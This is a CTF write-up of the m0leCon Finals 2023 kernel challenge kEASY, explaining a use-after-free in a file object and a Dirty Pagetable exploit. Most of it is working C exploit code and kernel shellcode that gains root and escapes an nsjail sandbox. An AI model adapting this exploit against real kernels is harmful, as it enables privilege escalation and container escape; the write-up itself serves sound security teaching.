CTFするぞ

CTF以外のことも書くよ

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

About

I participated m0leCon Finals 2023 CTF, which was held in Politecnico di Torino, Italy, as a member of std::weak_ptr<moon>*1.

Among the pwnable challenges I solved during the CTF, a kernel pwn named kEASY was quite interesting, and I'm going to explain about the exploitation technique I used to solve the task.

Challenge setup

The following link has challege files.

bitbucket.org

Distributed files:

kernel.conf
rootfs.cpio.gz
bzImage
run.sh
keasy.c
keasy.h

Mitigations

KASLR, SMAP, SMEP, and KPTI are enabled.

#!/bin/sh
qemu-system-x86_64 \
    -kernel bzImage \
    -cpu qemu64,+smep,+smap,+rdrand \
    -m 4G \
    -smp 4 \
    -initrd rootfs.cpio.gz \
    -hda flag.txt \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Mitigations such as randomization of slab freelist and slab hardening are also enabled. Additionally, the given shell itself is also sandboxed by nsjail, and it prohibits many system calls, as well as the resource limitation such as the number of processes.

Source code

A kernel module with an ioctl handler defined is working on the system. The handler is defined as the function below:

static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    long ret = -EINVAL;
    struct file *myfile;
    int fd;

    if (!enabled) {
        goto out;
    }
    enabled = 0;

    myfile = anon_inode_getfile("[easy]", &keasy_file_fops, NULL, 0);

    fd = get_unused_fd_flags(O_CLOEXEC);
    if (fd < 0) {
        ret = fd;
        goto err;
    }

    fd_install(fd, myfile);

    if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
        ret = -EINVAL;
        goto err;
    }

    ret = 0;
    return ret;

err:
    fput(myfile);
out:
    return ret;
}

It creates an anonymous file named [easy], and a file descriptor is assigned to it. Once it assigns a file descriptor, the number will be copied to user-land buffer.

This feature can only be called once*2 after the boot.

Vulnerability

If copy_to_user fails after the file descriptor is assigned by fd_install, the execution goes to err and fput will be called. fput decrements the reference count of a file. The counter will become zero in this case because the anonymous file is not shared, and the structure allocated for the file will be freed.

It means that Use-after-Free occurs if copy_to_user failes because the file itself is freed while the file descriptor is alive in user-land.

Confirming the bug

We can easily make copy_to_user fail if we pass an invalid address, which will cause Use-after-Free. Since the file descriptor will be the smallest possible number, we can speculate the number even if ioctl fails.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

int main() {
  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");

  // Get dangling file descriptor
  int ezfd = fd + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0)
    fatal("ioctl did not fail");

  // Use-after-free
  char buf[4];
  read(ezfd, buf, 4);
  return 0;
}

We can confirm the kernel crashes when we execute the code above.

UAF confirmed

What makes the exploit hard is that UAF occurs on a dedicated slab cache [1] instead of a generic slab cache. A file structure is allocated using a dedicated slab cache named files_cache

# cat /proc/slabinfo | grep files_cache
files_cache          920    920    704   23    4 : tunables    0    0    0 : slabdata     40     40      0

Therefore, objects other than files will not usually overlap after Use-after-Free unlike objects allocated with kmalloc, which makes the exploit difficult.

Cross-Cache Attack

Still, we can use an exploitation technique named cross-cache attack to exploit heap vulnerability that occurs on a dedicated cache. There are several attacks related to cross-cache such as Dirty Cred [2] and Dirty Pagetable.

The principle of cross-cache attack is simple, and I'm going to explain about attacks against Use-after-Free.

First of all, we spray objects allocated in the dedicated cache as described in ① and ② in the figure below.

Secondly, we free the UAF object as in ③ *3.

Finally, if we free every object sprayed, the slab page will also be freed since every object in this slab cache is no longer used.

The buddy system in Linux manages pages, and a freed page can be used for different purpose later on. Therefore, we can overlap the UAF file object with a structure completely different from files. とができます。

We will overwrite the cred structure used for managing privilege of a process in the Dirty Cred attack. However, we need some other attacks since the target is a file structure this time.

Dirty Pagetable

I used a technique named Dirty Pagetable to solve this challenge.

How it works

Just as Dirty Cred sets the cred structure as the attack target, Dirty Pagetable sets the page table as the attack target.

In x86-64 Linux, a 4-level page table is usually used to convert virtual addresses to physical addresses. Dirty Pagetable targets the PTE (Page Table Entry), which is the last level just before physical memory. In Linux, when a new PTE is required, the page for the PTE is also allocated with using the Buddy System.

Therefore, we can allocate a PTE on the same page where the dangling file pointer is located. The following figure describes the situation*4.

The following code overlaps a UAF object with a PTE. Remember to limit the number of CPUs to one so that the slab cache of the same CPU is used, since the process is running in a multi-threaded environment this time.

void bind_core(int core) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);
  sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

...

int main() {
  int file_spray[N_FILESPRAY];
  void *page_spray[N_PAGESPRAY];

  // Pin CPU (important!)
  bind_core(0);

  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");

  // Prepare pages (PTE not allocated at this moment)
  for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                         0x8000, PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (page_spray[i] == MAP_FAILED) fatal("mmap");
  }

  puts("[+] Spraying files...");
  // Spray file (1)
  for (int i = 0; i < N_FILESPRAY/2; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  // Get dangling file descriptorz
  int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
    fatal("ioctl did not fail");

  // Spray file (2)
  for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  puts("[+] Releasing files...");
  // Release the page for file slab cache
  for (int i = 0; i < N_FILESPRAY; i++)
    close(file_spray[i]);

  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (page fault)
  for (int i = 0; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  getchar();
  return 0;
}

The file structure right before it gets freed by fput:

After the PTE spray finishes, we will find a PTE-like data is allocated on the same address:

One of the entry points to the following physical memory, where we can find the data we wrote, which means the PTE is allocated for one of the sprayed pages.

Ideally, we want to overwrite this PTE, and make a user-land virtual address point to a kernel-land physical address. How we can overwrite PTE depends on the vulnerable object. Let's consider the case of a file structure.

Exploitation for a file structure

It is a bit hard to exploit a file structure because it has few fields we can control. The original article [3] explains about a method using dup, and we will also be using it.

A file structure has a filed named f_count at offset 0x38 from the beginning.

struct file {
    union {
        struct llist_node  f_llist;
        struct rcu_head    f_rcuhead;
        unsigned int      f_iocb_flags;
    };

    /*
    * Protects f_ep, f_flags.
    * Must not be taken from IRQ context.
    */
    spinlock_t      f_lock;
    fmode_t         f_mode;
    atomic_long_t       f_count;
    struct mutex       f_pos_lock;
...

f_count represents the reference count of the file object, and will be incremented when we call dup system call to duplicate the file descriptor. Therefore, we obtain a primitive to increment a pointer in the PTE.

So, can we simply call a lot of dup to make an entry in PTE point to kernel-land physical address?

It is not so simple, unfortunately.

Most of the physical addresses are randomized when KASLR is enabled. In addition, physical memory allocated for user-land exists at much lower address than physical memory for kernel-land, and the offset is big.

A process can have up to 65535 file descriptors in this environment, which limits the number of increments we can call. One solution is to use fork to separate the processes to bypass the limitation, but it is not possible this time because we can execute only 2 processes due to nsjail.

Therefore, we need to find other ways to make user-land virtual address point to kernel-land physical address.

UAF in physical memory

So far, the UAF file object is located at the same physical address as PTE as described in the figure below:

Here, if we call dup 0x1000 times, the entry at the location corresponding to f_count in the PTE will point to the next page, so that the entries in the two PTEs point to the same physical address.

After this modification, we can find the overlapping page by trying to read each page and check if the data written in the page changed.

  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");

  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");

We can detect the overlapping pages as shown below:

Checking the physical address of the detected page, we will find that 2 user-land virtual addresses point to the same physical address.

Note that overlapping is not important here, but the fact that we could find out the user-land virtual address corresponding to the PTE we can corrupt is important.

Arbitrary Physical Address Read/Write

As mentioned earlier, we cannot reach the kernel-land physical memory simply by calling a lot of dup system calls because of the distance between user-land and kernel-land physical memory. To resolve this problem, I used DMA-BUF Heap this time((The original article also mentions io_uring but it is not available because of nsjail.)).

DMA-BUF [4] is a memory for fast and secure access between multiple devices. We can open the DMA device at /dev/dma_heap/system to control DMA-BUF Heap. Calling DMA_HEAP_IOCTL_ALLOC ioctl to this device, we can allocate a memory that can be mapped to user-land.

The page mapped throught this ioctl is different from a page mapped by mmap. It will be allocated on physical memory close to PTEs *5.

So, if we prepare a DMA-BUF Heap page as the target PTE entry which we can corrupt with f_count, we can realize the following situation. (We have to allocate DMA-BUF Heap during PTE spray in order to allocate another PTE next to the DMA page.)

Since we already know which user-land page can corrupt the PTE, we will munmap it and mmap the DMA-BUF Heap page to make f_count overlap with the PTE entry for the DMA-BUF Heap page.

What is important is that a PTE exists next to the page allocated with DMA-BUF Heap. Therefore, if we again call dup 0x1000 times to increment f_count, the DMA-BUF Heap page mapped to user-land will point to a PTE.

Since we can read and write the DMA-BUF page mapped to user-land, we obtain a primitive to fully control a PTE. So, we can modify the PTE entries and make one of them point to arbitrary physical addresses, including kernel-land.

This is how we can achieve arbitrary physical address read/write.

If we run the following code, the page allocated with DMA-BUF will be adjacent to a PTE.

  /**
   * 3. Overlap UAF file with PTE
   */
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (1)
  for (int i = 0; i < N_PAGESPRAY/2; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  // Allocate DMA-BUF heap
  int dma_buf_fd = -1;
  struct dma_heap_allocation_data data;
  data.len = 0x1000;
  data.fd_flags = O_RDWR;
  data.heap_flags = 0;
  data.fd = 0;
  if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
    fatal("DMA_HEAP_IOCTL_ALLOC");
  printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

  // Allocate many PTEs (2)
  for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");

  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");

  // Place PTE entry for DMA buffer onto controllable PTE
  puts("[+] Remapping...");
  munmap(evil, 0x1000);
  void *dma = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
  *(char*)dma = '0';

Checking on gdb, we can find that a PTE is allocated at the address where the dangling file object was, and physical address for DMA-BUF is located at the offset corresponding to f_count. Additionally, the page next to DMA-BUF looks like another PTE.

Therefore, we can call dup 0x1000 times to corrupt a PTE.

  /**
   * Get physical AAR/AAW
   */
  // Corrupt physical address of DMA-BUF
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

Leaking physical base address

Reading and writing physical address will not fail regardless of the permission. So, we can search for specific machine codes or magic numbers to spot the physical address of the kernel.

Although it's already 2024, we can find some fixed physical addresses on both Linux and Windows.

The pages around here is always fixed, and data for page table is left. (Credit to shift_crops who found it during HITCON.) The page table has a pointer to kernel-land physical address, which is useful for leaking the physical base address of the kernel.

  // Leak kernel physical base
  void *wwwbuf = NULL;
  *(size_t*)dmabuf = 0x800000000009c067;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    if (page_spray[i] == evil) continue;
    if (*(size_t*)page_spray[i] > 0xffff) {
      wwwbuf = page_spray[i];
      printf("[+] Found victim page table: %p\n", wwwbuf);
      break;
    }
  }
  size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
  printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

Escaping from nsjail

This time we need to escape from nsjail as well as privilege escalation. Since it is complicated, let's execute a shellcode in kernel space.

We can simply overwrite the machine code of some random function in the Linux kernel with our shellcode because we have AAW primitive on physical memory. I modified do_symlinkat, which can be called inside nsjail. We can call symlink function in C to reach this kernel function.

Refer to [5] for what the shellcode is doing.

  init_cred         equ 0x1445ed8
  commit_creds      equ 0x00ae620
  find_task_by_vpid equ 0x00a3750
  init_nsproxy      equ 0x1445ce0
  switch_task_namespaces equ 0x00ac140
  init_fs                equ 0x1538248
  copy_fs_struct         equ 0x027f890
  kpti_bypass            equ 0x0c00f41

_start:
  endbr64
  call a
a:
  pop r15
  sub r15, 0x24d4c9

  ; commit_creds(init_cred) [3]
  lea rdi, [r15 + init_cred]
  lea rax, [r15 + commit_creds]
  call rax

  ; task = find_task_by_vpid(1) [4]
  mov edi, 1
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; switch_task_namespaces(task, init_nsproxy) [5]
  mov rdi, rax
  lea rsi, [r15 + init_nsproxy]
  lea rax, [r15 + switch_task_namespaces]
  call rax

  ; new_fs = copy_fs_struct(init_fs) [6]
  lea rdi, [r15 + init_fs]
  lea rax, [r15 + copy_fs_struct]
  call rax
  mov rbx, rax

  ; current = find_task_by_vpid(getpid())
  mov rdi, 0x1111111111111111   ; will be fixed at runtime
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; current->fs = new_fs [8]
  mov [rax + 0x740], rbx

  ; kpti trampoline [9]
  xor eax, eax
  mov [rsp+0x00], rax
  mov [rsp+0x08], rax
  mov rax, 0x2222222222222222   ; win
  mov [rsp+0x10], rax
  mov rax, 0x3333333333333333   ; cs
  mov [rsp+0x18], rax
  mov rax, 0x4444444444444444   ; rflags
  mov [rsp+0x20], rax
  mov rax, 0x5555555555555555   ; stack
  mov [rsp+0x28], rax
  mov rax, 0x6666666666666666   ; ss
  mov [rsp+0x30], rax
  lea rax, [r15 + kpti_bypass]
  jmp rax

  int3

以下が最終的なexploitです。

#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define N_PAGESPRAY 0x200
#define N_FILESPRAY 0x100

#define DMA_HEAP_IOCTL_ALLOC 0xc0184800
typedef unsigned long long u64;
typedef unsigned int u32;
struct dma_heap_allocation_data {
  u64 len;
  u32 fd;
  u32 fd_flags;
  u64 heap_flags;
};

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

void bind_core(int core) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);
  sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

unsigned long user_cs, user_ss, user_rsp, user_rflags;

static void save_state() {
  asm(
      "movq %%cs, %0\n"
      "movq %%ss, %1\n"
      "movq %%rsp, %2\n"
      "pushfq\n"
      "popq %3\n"
      : "=r"(user_cs), "=r"(user_ss), "=r"(user_rsp), "=r"(user_rflags)
      :
      : "memory");
}

int fd, dmafd, ezfd = -1;

static void win() {
  char buf[0x100];
  int fd = open("/dev/sda", O_RDONLY);
  if (fd < 0) {
    puts("[-] Lose...");
  } else {
    puts("[+] Win!");
    read(fd, buf, 0x100);
    write(1, buf, 0x100);
    puts("[+] Done");
  }
  exit(0);
}

int main() {
  int file_spray[N_FILESPRAY];
  void *page_spray[N_PAGESPRAY];

  /**
   * 1. Setup
   */
  // Pin CPU (important!)
  bind_core(0);
  save_state();

  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");
  // Open DMA-BUF
  int dmafd = creat("/dev/dma_heap/system", O_RDWR);
  if (dmafd == -1)
    fatal("/dev/dma_heap/system");

  // Prepare pages (PTE not allocated at this moment)
  for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                         0x8000, PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (page_spray[i] == MAP_FAILED) fatal("mmap");
  }

  /**
   * 2. Release the page where dangling file points
   */
  puts("[+] Spraying files...");
  // Spray file (1)
  for (int i = 0; i < N_FILESPRAY/2; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  // Get dangling file descriptorz
  int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
    fatal("ioctl did not fail");

  // Spray file (2)
  for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  puts("[+] Releasing files...");
  // Release the page for file slab cache
  for (int i = 0; i < N_FILESPRAY; i++)
    close(file_spray[i]);

  /**
   * 3. Overlap UAF file with PTE
   */
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (1)
  for (int i = 0; i < N_PAGESPRAY/2; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  // Allocate DMA-BUF heap
  int dma_buf_fd = -1;
  struct dma_heap_allocation_data data;
  data.len = 0x1000;
  data.fd_flags = O_RDWR;
  data.heap_flags = 0;
  data.fd = 0;
  if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
    fatal("DMA_HEAP_IOCTL_ALLOC");
  printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

  // Allocate many PTEs (2)
  for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");

  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");

  // Place PTE entry for DMA buffer onto controllable PTE
  puts("[+] Remapping...");
  munmap(evil, 0x1000);
  void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
  *(char*)dmabuf = '0';

  /**
   * Get physical AAR/AAW
   */
  // Corrupt physical address of DMA-BUF
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

  // Leak kernel physical base
  void *wwwbuf = NULL;
  *(size_t*)dmabuf = 0x800000000009c067;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    if (page_spray[i] == evil) continue;
    if (*(size_t*)page_spray[i] > 0xffff) {
      wwwbuf = page_spray[i];
      printf("[+] Found victim page table: %p\n", wwwbuf);
      break;
    }
  }
  size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
  printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

  /**
   * Overwrite setxattr
   */
  puts("[+] Overwriting do_symlinkat...");
  size_t phys_func = phys_base + 0x24d4c0;
  *(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
  char shellcode[] = {0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, 0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, 0xff, 0xe0, 0xcc};

  void *p;
  p = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
  *(size_t*)p = getpid();
  p = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
  *(size_t*)p = (size_t)&win;
  p = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
  *(size_t*)p = user_cs;
  p = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
  *(size_t*)p = user_rflags;
  p = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
  *(size_t*)p = user_rsp;
  p = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
  *(size_t*)p = user_ss;

  memcpy(wwwbuf + (phys_func & 0xfff), shellcode, sizeof(shellcode));
  puts("[+] GO!GO!");

  printf("%d\n", symlink("/jail/x", "/jail"));

  puts("[-] Failed...");
  close(fd);

  getchar();
  return 0;
}

Yay!

References

1: Linux Slab Allocator - About slab allocator
2: 手を動かして理解するLinux Kernel Exploit - About Dirty Cred
3: Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel - The original article explaining about Dirty Pagetable
4: DMA-BUF Heaps - About DMA-BUF Heap
5: CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel - How to bypass nsjail

*1:Team name consists of st98, weak ptr-yudai, and keymoon.

*2:We can actually call it multiple times due to the lack of mutex, but it's not necessary.

*3:Allocation and release take place in the same function in this case, but it doesn't matter since we will free all objects in ④ eventually.

*4:The file structure is actually much larger in size.

*5:Refer [3] for more details.